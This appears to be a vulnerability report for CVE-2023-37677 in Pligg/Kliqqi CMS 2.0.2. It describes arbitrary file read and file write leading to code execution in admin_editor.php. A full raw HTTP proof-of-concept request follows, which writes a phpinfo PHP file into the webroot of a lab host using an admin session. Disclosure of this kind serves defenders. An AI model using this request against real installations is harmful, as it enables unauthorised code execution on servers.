Headline
CVE-2023-37677: Users with specific permissions can read arbitrary files and modify files to cause remote command execution in admin_editor.php · Issue #264 · Kliqqi-CMS/Kliqqi-CMS
Pligg CMS v2.0.2 (also known as Kliqqi) was discovered to contain a remote code execution (RCE) vulnerability in the component admin_editor.php.
admin_editor.php
Arbitrary file read vulnerability: Post the_file (the path to the file to be read).
Arbitrary file upload RCE vulnerability: Post updatefile (the content to be modified) and the_file2 (the path to save the file).
Host: 192.168.2.14
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 148
Origin: http://192.168.2.14
Connection: close
Referer: http://192.168.2.14/pligg-cms/admin/admin_editor.php
Cookie: panelState=; PHPSESSID=10b67e196207898bd4ae3032a846c574; mnm_user=admin; mnm_key=YWRtaW46MjJrTkdHVDVLbG9NWTpiMzJmYTE4Mjc1MmE2YjBiZGMwNzY3NmM3ZGZkY2UzNQ%3D%3D
Upgrade-Insecure-Requests: 1
the_file2=c:\phpstudy_pro\www\pligg-cms\phpinfo.php&updatedfile=%3C%3Fphp+phpinfo%28%29%3B%3F%3E%0D%0Ahack+TestIng%0D%0A&isempty=1&save=Save+Changes